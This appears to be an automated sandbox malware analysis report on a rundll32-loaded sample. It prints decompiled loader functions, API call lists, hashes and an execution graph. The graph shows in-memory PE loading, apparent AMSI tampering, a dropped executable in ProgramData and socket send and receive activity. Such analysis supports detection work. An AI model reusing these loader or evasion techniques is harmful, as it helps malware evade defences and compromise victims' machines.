    • Instruction ID: 4fd525a886778c85d3a7cf1853bc9729b520255f810b3e593404ecbb3ee3ac9b
    • Opcode Fuzzy Hash: 7633e0b11875ad5d9d2df7cc0010fd67d10b4eb24327e3986778f7d27c9c9e51
    • Instruction Fuzzy Hash: 26D0C9B4645208BBE714CA94D846F69BBACE704611F004195FE189B280D5B1AE0057A1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A1140, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E011A1140(void* __ecx, long _a4) {
				void* _v8;
				void* _t5;

				_t5 = VirtualAlloc(0, _a4, 0x3000, 4); // executed
				_v8 = _t5;
				return _v8;
			}





    0x011a1151
    0x011a1157
    0x011a1160

    APIs
    • VirtualAlloc.KERNELBASE(00000000,011A11A1,00003000,00000004,00000004,?,011A11A1,?), ref: 011A1151
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 3fe5196feb6f0d953bb858480843c70bce040ba5e8b863552bd6fefa9bf6b174
    • Instruction ID: 9ce70d81ed5c668be03ddeb6cea70194006fdf53b0b0118a91aa25f1371df8e9
    • Opcode Fuzzy Hash: 3fe5196feb6f0d953bb858480843c70bce040ba5e8b863552bd6fefa9bf6b174
    • Instruction Fuzzy Hash: 37D0C974685208BBE714CA84D906F6ABBACE705621F000194FE089B280D5B16E404791
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01191820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
    Download Yara Rule
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 0119182F
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 62f9285bef2325c35d0dc24c126c83aad8196966beda75f00a1a33c3225fab14
    • Instruction ID: 0a58ee752a182983cfb2e292605dbe4e09d12b58adef5c6337f40b590c2acdb1
    • Opcode Fuzzy Hash: 62f9285bef2325c35d0dc24c126c83aad8196966beda75f00a1a33c3225fab14
    • Instruction Fuzzy Hash: D2C04C7611430CAB8B04DF98E884DAB37ADBB8C610B048518BA2D87204C630F9508BA4
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 011914A0, Relevance: 12.2, APIs: 8, Instructions: 171COMMON
    Download Yara Rule
    APIs
    • SetLastError.KERNEL32(0000007F), ref: 011914DB
    • SetLastError.KERNEL32(0000007F), ref: 01191507
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 8c671ad3eae21bfc91b3cb7d8db54a713391db761be32aa3e5a718700843a6d8
    • Instruction ID: 9df4b697dabffaec33f06140dadb89ae984587a27d57077572bbf7271aa4032f
    • Opcode Fuzzy Hash: 8c671ad3eae21bfc91b3cb7d8db54a713391db761be32aa3e5a718700843a6d8
    • Instruction Fuzzy Hash: 3571F874E0410AEFDF08DF98C580AADB7B2FF48314F2585A9D426AB345D774EA81CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 033712B0, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 55COMMON
    Download Yara Rule
    C-Code - Quality: 25%
    			E033712B0() {
				signed int _v8;
				void _v40;
				void* _v52;
				void* _v56;
				char _v124;
				int _t23;
				void* _t32;
				void* _t37;
				signed int _t40;

				_v8 =  *0x3373004 ^ _t40;
				 *0x3373028( &_v124, 0, 0x44, _t32, _t37);
				 *0x3373028( &_v56, 0, 0x10);
				_v124 = 0x44;
				memcpy( &_v40, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
				asm("movsw");
				asm("movsb");
				 *0x3373018( &_v40, 0, 0, 0, 0, 0, 0, "C:\\",  &_v124,  &_v56);
				CloseHandle(_v56);
				_t23 = CloseHandle(_v52);
				E03371A04();
				return _t23;
			}












    0x033712bd
    0x033712ca
    0x033712db
    0x033712e4
    0x033712f8
    0x033712fa
    0x033712fc
    0x0337131a
    0x03371324
    0x0337132e
    0x0337133b
    0x03371343

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.668060924.0000000003371000.00000020.00000001.sdmp, Offset: 03370000, based on PE: true
    • Associated: 00000004.00000002.668050457.0000000003370000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_3370000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID: C:\$C:\ProgramData\huqvg\huqvg.exe$C:\ProgramData\huqvg\huqvg.exe$D
    • API String ID: 2962429428-1049507935
    • Opcode ID: a4e178ee757a2f70ef1c9caa7f7ffd2a301432a7184d3a01622f91254f3ae2df
    • Instruction ID: 745b257f61b8dc21c771f2c56a794413d85d38c2b5ccd4e89f3248e15bd08d1f
    • Opcode Fuzzy Hash: a4e178ee757a2f70ef1c9caa7f7ffd2a301432a7184d3a01622f91254f3ae2df
    • Instruction Fuzzy Hash: 57019675D0020CBBDB20EBA4D885FDE777CEB48714F100418FA06E7180D6796A08CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011925E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56librarymemoryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryExA.KERNEL32(01194070,00000000,00000800), ref: 011925F9
    • GetProcAddress.KERNEL32(00000000,01194078), ref: 01192615
    • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 01192650
    • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 01192671
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual$AddressLibraryLoadProc
    • String ID: AMSI
    • API String ID: 3300690313-3828877684
    • Opcode ID: 0a1e017d85acd35c0a213467bb4b99a5810af9a10b66434bdda044c6f594fd33
    • Instruction ID: 6b9472d915c679446c7b4e3548a0c43313d5bd4fe87905d0f6acadcf213b6425
    • Opcode Fuzzy Hash: 0a1e017d85acd35c0a213467bb4b99a5810af9a10b66434bdda044c6f594fd33
    • Instruction Fuzzy Hash: 79111CB4E00209EFCF18CFA4C845BAEBBB4FB48304F104559EA21A7740D7B46A44CB95
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01154466, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
    Download Yara Rule
    APIs
    • GetProcAddress.KERNEL32(?), ref: 011544DA
    • GetProcAddress.KERNEL32(?), ref: 011544E4
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1150000_rundll32.jbxd
    Similarity
    • API ID: AddressProc
    • String ID: D$dll
    • API String ID: 190572456-2257804249
    • Opcode ID: d6a5440daa4b5954b40f572194cbb49577153b61c06ced8391ffe2c57ab3dd00
    • Instruction ID: f007086256638abddeb451a1a60bdff3b54dbf4b07678141c600e07904521921
    • Opcode Fuzzy Hash: d6a5440daa4b5954b40f572194cbb49577153b61c06ced8391ffe2c57ab3dd00
    • Instruction Fuzzy Hash: 32018071900218BBEB14EBA4CC99FDF7B7DEB48704F104018FB05A7185DB756A48CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A1FA0, Relevance: 6.4, APIs: 5, Instructions: 121COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E011A1FA0(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				signed short* _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t82;
				void* _t124;

				_v40 = __ecx;
				_t3 = _a4 + 4; // 0x3
				_v12 =  *_t3;
				_v16 = 0;
				_v32 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v32 + 4)) != 0) {
					_v8 = _v12 +  *_v32;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0xffff) != 0) {
							_v24 = _v12 +  *((intOrPtr*)(_v8 + 0x20));
							_v28 = _v12 +  *((intOrPtr*)(_v8 + 0x24));
							_v36 = 0;
							_v20 = 0;
							while(_v20 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t82 = E011A11E0(_a8, _v12 +  *_v24);
								_t124 = _t124 + 8;
								if(_t82 != 0) {
									_v20 = _v20 + 1;
									_v24 = _v24 + 4;
									_v28 =  &(_v28[1]);
									continue;
								}
								_v16 =  *_v28 & 0x0000ffff;
								_v36 = 1;
								break;
							}
							if(_v36 != 0) {
								L17:
								if(_v16 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v12 +  *((intOrPtr*)(_v12 +  *((intOrPtr*)(_v8 + 0x1c)) + _v16 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v16 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}














    0x011a1fa6
    0x011a1fac
    0x011a1faf
    0x011a1fb2
    0x011a1fca
    0x011a1fd4
    0x011a1fed
    0x011a1ff7
    0x011a2004
    0x00000000
    0x011a2011
    0x011a2021
    0x011a2069
    0x011a2075
    0x011a2078
    0x011a207f
    0x011a20a3
    0x011a20bb
    0x011a20c0
    0x011a20c5
    0x011a208e
    0x011a2097
    0x011a20a0
    0x00000000
    0x011a20a0
    0x011a20cd
    0x011a20d0
    0x00000000
    0x011a20d0
    0x011a20df
    0x011a20ed
    0x011a20f6
    0x00000000
    0x011a2113
    0x011a20fa
    0x00000000
    0x011a2100
    0x011a20e3
    0x00000000
    0x011a20e9
    0x011a2035
    0x011a2058
    0x00000000
    0x011a2058
    0x011a2039
    0x00000000
    0x011a203f
    0x011a1ff7
    0x011a1fd8
    0x00000000

    APIs
    • SetLastError.KERNEL32(0000007F,?,?,?,?,011A1039,00000000), ref: 011A1FD8
    • SetLastError.KERNEL32(0000007F,?,?,?,?,011A1039,00000000), ref: 011A2004
    Memory Dump Source
    • Source File: 00000004.00000002.667595301.00000000011A1000.00000020.00000001.sdmp, Offset: 011A0000, based on PE: true
    • Associated: 00000004.00000002.667583917.00000000011A0000.00000004.00000001.sdmp Download File
    • Associated: 00000004.00000002.667605650.00000000011A3000.00000002.00000001.sdmp Download File
    • Associated: 00000004.00000002.667615894.00000000011A4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_11a0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast
    • String ID:
    • API String ID: 1452528299-0
    • Opcode ID: 6741611c03d16aed724bf62292b3ee609197003f0bc6652615da6ca554eba72b
    • Instruction ID: b03fb9f53368d53efd25a205f2353de15fcac0aab5effb489e41af65989d82a1
    • Opcode Fuzzy Hash: 6741611c03d16aed724bf62292b3ee609197003f0bc6652615da6ca554eba72b
    • Instruction Fuzzy Hash: 6B510A78A44209DFDB18CF98C581BAEBBB2FF48304F608169D515AB381D735EA81CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01154266, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80threadCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 011547F6: atoi.MSVCRT ref: 011548F0
      • Part of subcall function 011547F6: _initterm.MSVCRT ref: 01154905
    • DisableThreadLibraryCalls.KERNEL32(00003A98), ref: 0115431C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1150000_rundll32.jbxd
    Similarity
    • API ID: CallsDisableLibraryThread_inittermatoi
    • String ID: EL32.dll$dll
    • API String ID: 2582834166-3514254202
    • Opcode ID: 3677c87e7301b03a0ea7938c50ba3f2ac51d1810227c807ec84151f250858ddc
    • Instruction ID: 515b4ee2c2b815b99ef32150bd52cffd402948b6a128caea1f714444ffd3dcfe
    • Opcode Fuzzy Hash: 3677c87e7301b03a0ea7938c50ba3f2ac51d1810227c807ec84151f250858ddc
    • Instruction Fuzzy Hash: CD21D871E00118EBEB08DBE8CC95ADFBB79FF44304F144028E905AB244E775AA56C791
    Uniqueness

    Uniqueness Score: -1.00%

    Function 01192430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 01192468
    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 011924B2
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.667473154.0000000001191000.00000020.00000001.sdmp, Offset: 01191000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_1191000_rundll32.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID: @
    • API String ID: 544645111-2766056989
    • Opcode ID: 7f799b2d57aad6568a717478484aebfc33a01759fd265d7bdc1f4fde80dd93f2
    • Instruction ID: f6450f969693f3d4302ed4300911c14711678e9393437e9f1e3b694b26e3c691
    • Opcode Fuzzy Hash: 7f799b2d57aad6568a717478484aebfc33a01759fd265d7bdc1f4fde80dd93f2
    • Instruction Fuzzy Hash: B521E8B4A04209FFDF18CF98C980BADBBB5BF44304F248199D925AB245C774AB80DB55
    Uniqueness

    Uniqueness Score: -1.00%

    Analysis Process: rundll32.exe PID: 5752 Parent PID: 7088 rundll32.exeCOMMON

    Execution Graph

    Execution Coverage:41%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:0%
    Total number of Nodes:282
    Total number of Limit Nodes:17

    Graph

    execution_graph 1264 118157a 1265 1181688 1264->1265 1266 118169f 1265->1266 1267 1181693 SetLastError 1265->1267 1267->1266 973 1182690 976 1181000 973->976 979 1181030 LoadLibraryW GetProcAddress 976->979 1021 1181b30 979->1021 982 1181091 SetLastError 1015 118102b 982->1015 983 11810a3 984 1181b30 SetLastError 983->984 985 11810b9 984->985 986 11810de SetLastError 985->986 987 11810f0 985->987 985->1015 986->1015 988 11810ff SetLastError 987->988 989 1181111 987->989 988->1015 990 118111c SetLastError 989->990 992 118112e GetNativeSystemInfo 989->992 990->1015 993 11811bc 992->993 994 11811e9 993->994 995 11811d7 SetLastError 993->995 1024 1181800 VirtualAlloc 994->1024 995->1015 996 1181202 997 118123d GetProcessHeap RtlAllocateHeap 996->997 1025 1181800 VirtualAlloc 996->1025 998 118127b 997->998 999 1181257 SetLastError 997->999 1003 1181b30 SetLastError 998->1003 999->1015 1000 1181222 1000->997 1001 118122e SetLastError 1000->1001 1001->1015 1004 11812fb 1003->1004 1005 1181302 1004->1005 1026 1181800 VirtualAlloc 1004->1026 1057 11816c0 1005->1057 1006 1181320 1027 1181b50 1006->1027 1009 118136b 1009->1005 1033 11821a0 1009->1033 1013 11813ca 1013->1005 1014 11813eb 1013->1014 1014->1015 1016 11813ff GetPEB 1014->1016 1052 1191000 1016->1052 1022 1181b3b SetLastError 1021->1022 1023 1181070 1021->1023 1022->1023 1023->982 1023->983 1023->1015 1024->996 1025->1000 1026->1006 1031 1181b7d 1027->1031 1028 1181b30 SetLastError 1029 1181c32 1028->1029 1030 1181be9 1029->1030 1065 1181800 VirtualAlloc 1029->1065 1030->1009 1031->1028 1031->1030 1034 11821dd IsBadHugeReadPtr 1033->1034 1043 11813b5 1033->1043 1036 1182207 1034->1036 1034->1043 1037 1182239 SetLastError 1036->1037 1038 118224d 1036->1038 1036->1043 1037->1043 1066 1181a20 1038->1066 1041 1182273 SetLastError 1041->1043 1043->1005 1046 1181e80 1043->1046 1044 118229d 1044->1043 1045 11823ae SetLastError 1044->1045 1045->1043 1047 1181eba 1046->1047 1048 1181fe5 1047->1048 1050 1181fc1 1047->1050 1081 1181d10 1047->1081 1049 1181d10 2 API calls 1048->1049 1049->1050 1050->1013 1089 1191f70 1052->1089 1058 11816d2 1057->1058 1059 11816d7 1057->1059 1058->1015 1060 11819d0 VirtualFree 1059->1060 1064 118170b 1060->1064 1061 1181770 GetProcessHeap HeapFree 1061->1058 1063 11819d0 VirtualFree 1063->1061 1064->1061 1064->1063 1065->1030 1067 1181a35 1066->1067 1068 1181a2c 1066->1068 1072 1181a43 1067->1072 1074 11819f0 VirtualAlloc 1067->1074 1075 1181900 1068->1075 1071 1181a51 1071->1072 1078 11819d0 1071->1078 1072->1041 1072->1044 1074->1071 1076 1181910 VirtualQuery 1075->1076 1077 118190c 1075->1077 1076->1077 1077->1067 1079 11819d9 VirtualFree 1078->1079 1080 11819ea 1078->1080 1079->1080 1080->1072 1082 1181d29 1081->1082 1086 1181d1f 1081->1086 1083 1181d37 1082->1083 1084 1181d9d VirtualProtect 1082->1084 1083->1086 1088 1181820 VirtualFree 1083->1088 1084->1086 1086->1047 1088->1086 1104 1191b50 1089->1104 1092 1191fa0 1093 1191fe5 1092->1093 1094 1191fd6 SetLastError 1092->1094 1095 1192002 SetLastError 1093->1095 1096 1192011 1093->1096 1102 1191039 1094->1102 1095->1102 1097 1192023 1096->1097 1103 1192060 1096->1103 1098 1192037 SetLastError 1097->1098 1099 1192046 1097->1099 1098->1102 1101 11920f8 SetLastError 1099->1101 1099->1102 1100 11920e1 SetLastError 1100->1102 1101->1102 1102->1015 1103->1099 1103->1100 1141 1191270 1104->1141 1107 1191025 1107->1092 1108 1191b93 SetLastError 1108->1107 1109 1191ba5 1110 1191270 SetLastError 1109->1110 1111 1191bbe 1110->1111 1111->1107 1112 1191be0 SetLastError 1111->1112 1113 1191bf2 1111->1113 1112->1107 1114 1191c01 SetLastError 1113->1114 1115 1191c13 1113->1115 1114->1107 1116 1191c1e SetLastError 1115->1116 1118 1191c30 GetNativeSystemInfo 1115->1118 1116->1107 1119 1191ce4 SetLastError 1118->1119 1120 1191cf6 VirtualAlloc 1118->1120 1119->1107 1121 1191d42 GetProcessHeap HeapAlloc 1120->1121 1122 1191d17 VirtualAlloc 1120->1122 1124 1191d7c 1121->1124 1125 1191d5c VirtualFree SetLastError 1121->1125 1122->1121 1123 1191d33 SetLastError 1122->1123 1123->1107 1126 1191270 SetLastError 1124->1126 1125->1107 1127 1191ded 1126->1127 1128 1191dfb VirtualAlloc 1127->1128 1137 1191df1 1127->1137 1129 1191e2a 1128->1129 1144 11912a0 1129->1144 1132 1191e5e 1132->1137 1154 11918c0 1132->1154 1136 1191ec7 1136->1137 1175 11b1010 1136->1175 1137->1107 1179 1192120 1137->1179 1139 1191f1f SetLastError 1139->1137 1142 119128b 1141->1142 1143 119127f SetLastError 1141->1143 1142->1107 1142->1108 1142->1109 1143->1142 1145 11912d0 1144->1145 1146 1191363 1145->1146 1147 119130c VirtualAlloc 1145->1147 1153 1191380 1145->1153 1148 1191270 SetLastError 1146->1148 1149 1191330 1147->1149 1150 1191337 1147->1150 1151 119137c 1148->1151 1149->1153 1150->1145 1152 1191384 VirtualAlloc 1151->1152 1151->1153 1152->1153 1153->1132 1155 1191900 IsBadReadPtr 1154->1155 1165 11918f6 1154->1165 1157 119192a 1155->1157 1155->1165 1157->1165 1186 1191af0 LoadLibraryA 1157->1186 1159 119195c SetLastError 1159->1165 1160 1191970 1188 1191170 1160->1188 1163 1191996 SetLastError 1163->1165 1165->1137 1169 11915b0 1165->1169 1166 1191ad1 SetLastError 1166->1165 1167 11919c0 1167->1165 1167->1166 1173 11915f8 1169->1173 1170 1191701 1171 1191460 2 API calls 1170->1171 1174 11916dd 1171->1174 1173->1170 1173->1174 1203 1191460 1173->1203 1174->1136 1176 11b1022 1175->1176 1177 1191f16 1175->1177 1210 11b11a0 13 API calls 1176->1210 1177->1137 1177->1139 1180 1192135 1179->1180 1185 119213a 1179->1185 1180->1107 1181 11921c4 1182 11921d0 VirtualFree 1181->1182 1183 11921e4 GetProcessHeap HeapFree 1181->1183 1182->1183 1183->1180 1184 1191120 VirtualFree 1184->1181 1185->1181 1185->1184 1187 1191950 1186->1187 1187->1159 1187->1160 1189 1191185 1188->1189 1190 119117c 1188->1190 1195 1191193 1189->1195 1196 1191140 VirtualAlloc 1189->1196 1197 1191050 1190->1197 1193 11911a1 1193->1195 1200 1191120 1193->1200 1195->1163 1195->1167 1196->1193 1198 1191060 VirtualQuery 1197->1198 1199 119105c 1197->1199 1198->1199 1199->1189 1201 1191129 VirtualFree 1200->1201 1202 119113a 1200->1202 1201->1202 1202->1195 1204 119147c 1203->1204 1205 1191472 1203->1205 1206 119148a 1204->1206 1208 11914e4 VirtualProtect 1204->1208 1205->1173 1206->1205 1207 11914c2 VirtualFree 1206->1207 1207->1205 1208->1205 1215 11b1040 CreateDirectoryA 1210->1215 1216 11b1094 1215->1216 1231 11b1a04 1216->1231 1218 11b10a4 1219 11b10b0 1218->1219 1239 11b1640 1219->1239 1222 11b1640 15 API calls 1223 11b1133 1222->1223 1224 11b114d 1223->1224 1226 11b1171 1223->1226 1254 11b1350 CreateFileA WriteFile CloseHandle 1224->1254 1229 11b1a04 5 API calls 1226->1229 1227 11b115e Sleep 1255 11b12b0 1227->1255 1230 11b1197 1229->1230 1230->1177 1232 11b1a0f IsProcessorFeaturePresent 1231->1232 1233 11b1a0d 1231->1233 1235 11b1a89 1232->1235 1233->1218 1238 11b1a4d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1235->1238 1237 11b1b6c 1237->1218 1238->1237 1240 11b164d 1239->1240 1260 11b1470 1240->1260 1244 11b1759 1247 11b1a04 5 API calls 1244->1247 1245 11b1760 socket gethostbyname htons connect 1245->1244 1246 11b17e3 send 1245->1246 1250 11b19dd closesocket WSACleanup 1246->1250 1253 11b1864 1246->1253 1248 11b10f2 1247->1248 1248->1222 1250->1244 1251 11b18ac recv 1252 11b19c3 1251->1252 1251->1253 1252->1250 1253->1251 1254->1227 1256 11b12d0 CloseHandle CloseHandle 1255->1256 1258 11b1a04 5 API calls 1256->1258 1259 11b1340 1258->1259 1259->1226 1261 11b14c8 1260->1261 1262 11b1a04 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1261->1262 1263 11b1635 wsprintfA WSAStartup 1262->1263 1263->1244 1263->1245 1268 1181890 FreeLibrary 1269 1182430 1270 1182441 VirtualProtect 1269->1270 1273 118243c 1269->1273 1271 1182472 1270->1271 1272 11824a4 VirtualProtect 1271->1272 1271->1273 1272->1273 1274 1181870 GetProcAddress 1283 1191df6 1284 1191f5c 1283->1284 1285 1192120 4 API calls 1284->1285 1286 1191f68 1285->1286 1287 11821ea 1288 11821f3 IsBadHugeReadPtr 1287->1288 1289 11823bb 1288->1289 1290 1182207 1288->1290 1290->1289 1291 1182239 SetLastError 1290->1291 1292 118224d 1290->1292 1291->1289 1293 1181a20 3 API calls 1292->1293 1294 1182267 1293->1294 1295 1182273 SetLastError 1294->1295 1297 118229d 1294->1297 1295->1289 1297->1289 1298 11823ae SetLastError 1297->1298 1298->1289 1299 119190d 1300 1191916 IsBadReadPtr 1299->1300 1301 119192a 1300->1301 1302 1191ade 1300->1302 1301->1302 1312 1191af0 LoadLibraryA 1301->1312 1303 1191950 1304 119195c SetLastError 1303->1304 1305 1191970 1303->1305 1304->1302 1306 1191170 3 API calls 1305->1306 1307 119198a 1306->1307 1308 1191996 SetLastError 1307->1308 1311 11919c0 1307->1311 1308->1302 1310 1191ad1 SetLastError 1310->1302 1311->1302 1311->1310 1312->1303 1317 1181840 LoadLibraryA 1318 1181857 1317->1318 1319 11814a0 1320 11814e8 1319->1320 1321 11814d9 SetLastError 1319->1321 1323 1181505 SetLastError 1320->1323 1324 1181514 1320->1324 1322 118169f 1321->1322 1323->1322 1325 1181562 1324->1325 1326 1181527 1324->1326 1329 118156b SetLastError 1325->1329 1330 118157f 1325->1330 1327 1181549 1326->1327 1328 118153a SetLastError 1326->1328 1327->1322 1333 1181693 SetLastError 1327->1333 1328->1322 1329->1322 1331 1181648 bsearch 1330->1331 1338 11819f0 VirtualAlloc 1330->1338 1331->1327 1332 1181672 SetLastError 1331->1332 1332->1322 1333->1322 1335 11815b3 1336 11815c8 SetLastError 1335->1336 1337 11815d7 1335->1337 1336->1322 1337->1331 1338->1335 1339 11825e0 LoadLibraryExA 1340 1182608 1339->1340 1341 118260c GetProcAddress 1339->1341 1342 1182627 VirtualProtect VirtualProtect 1341->1342 1342->1340

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_01181D10 32 Function_01181820 0->32 34 Function_01181B20 0->34 1 Function_01181A90 2 Function_01182690 9 Function_01181000 2->9 3 Function_01182010 4 Function_01182090 68 Function_011818F0 4->68 5 Function_01181890 6 Function_011B1010 42 Function_011B11A0 6->42 7 Function_0119190D 70 Function_01191170 7->70 72 Function_01191AF0 7->72 8 Function_01181800 19 Function_01181030 9->19 10 Function_01181E80 10->0 23 Function_011818B0 10->23 56 Function_01181CC0 10->56 11 Function_01181900 12 Function_01182400 12->1 13 Function_01181980 14 Function_01191000 40 Function_01191FA0 14->40 71 Function_01191F70 14->71 15 Function_01191080 16 Function_01191400 17 Function_011B1000 18 Function_011B1A04 54 Function_011B1A4D 18->54 19->3 19->4 19->8 19->10 19->13 19->14 21 Function_01181B30 19->21 33 Function_011821A0 19->33 47 Function_01181B50 19->47 48 Function_011818D0 19->48 57 Function_011816C0 19->57 20 Function_01181930 22 Function_01182430 35 Function_011818A0 23->35 24 Function_011915B0 24->16 79 Function_01191460 24->79 25 Function_01191730 26 Function_011917B0 27 Function_011B10B0 27->18 28 Function_011B12B0 27->28 53 Function_011B1350 27->53 63 Function_011B1640 27->63 28->18 29 Function_01191EB6 39 Function_01192120 29->39 30 Function_01191F2C 30->39 31 Function_01181A20 31->11 31->13 45 Function_011819D0 31->45 66 Function_011819F0 31->66 33->31 36 Function_011814A0 36->66 37 Function_011912A0 37->15 51 Function_011910D0 37->51 73 Function_01191270 37->73 38 Function_01191120 39->38 80 Function_011911E0 40->80 41 Function_01191B20 42->27 62 Function_011B1040 42->62 43 Function_011B1A20 44 Function_011B13A0 46 Function_011823D0 46->1 47->8 47->13 47->20 47->21 49 Function_01191B50 49->6 49->24 49->25 49->26 49->37 49->39 49->51 59 Function_011918C0 49->59 49->73 50 Function_01191050 52 Function_01191ED0 52->39 55 Function_01181840 57->45 58 Function_011817C0 59->70 59->72 60 Function_01191140 61 Function_01191B40 62->18 63->18 63->43 63->44 74 Function_011B1470 63->74 64 Function_0119187B 65 Function_0118157A 67 Function_01181870 69 Function_011824F0 69->20 70->38 70->50 70->51 70->60 71->49 74->18 75 Function_01191DF6 75->39 76 Function_011821EA 76->31 77 Function_01182160 77->68 78 Function_011825E0 81 Function_01191E67 81->39 82 Function_01191EE7 82->39

    Executed Functions

    Function 01181030, Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 115 1181030-1181075 LoadLibraryW GetProcAddress call 1181b30 118 118107e-118108f 115->118 119 1181077-1181079 115->119 121 1181091-118109e SetLastError 118->121 122 11810a3-11810be call 1181b30 118->122 120 118148d-1181490 119->120 121->120 125 11810c0-11810c2 122->125 126 11810c7-11810dc 122->126 125->120 127 11810de-11810eb SetLastError 126->127 128 11810f0-11810fd 126->128 127->120 129 11810ff-118110c SetLastError 128->129 130 1181111-118111a 128->130 129->120 131 118111c-1181129 SetLastError 130->131 132 118112e-118114f 130->132 131->120 133 1181163-118116d 132->133 134 118116f-1181176 133->134 135 11811a5-11811d5 GetNativeSystemInfo call 11818d0 * 2 133->135 136 1181178-1181184 134->136 137 1181186-1181192 134->137 146 11811e9-118120c call 1181800 135->146 147 11811d7-11811e4 SetLastError 135->147 139 1181195-118119b 136->139 137->139 141 118119d-11811a0 139->141 142 11811a3 139->142 141->142 142->133 149 118123d-1181255 GetProcessHeap RtlAllocateHeap 146->149 150 118120e-118121f call 1181800 146->150 147->120 151 118127b-1181291 149->151 152 1181257-1181276 SetLastError 149->152 153 1181222-118122c 150->153 154 118129c 151->154 155 1181293-118129a 151->155 152->120 153->149 156 118122e-1181238 SetLastError 153->156 158 11812a3-1181300 call 1181b30 154->158 155->158 156->120 161 1181302 158->161 162 1181307-1181370 call 1181800 call 1181980 call 1181b50 158->162 163 118147f-118148b 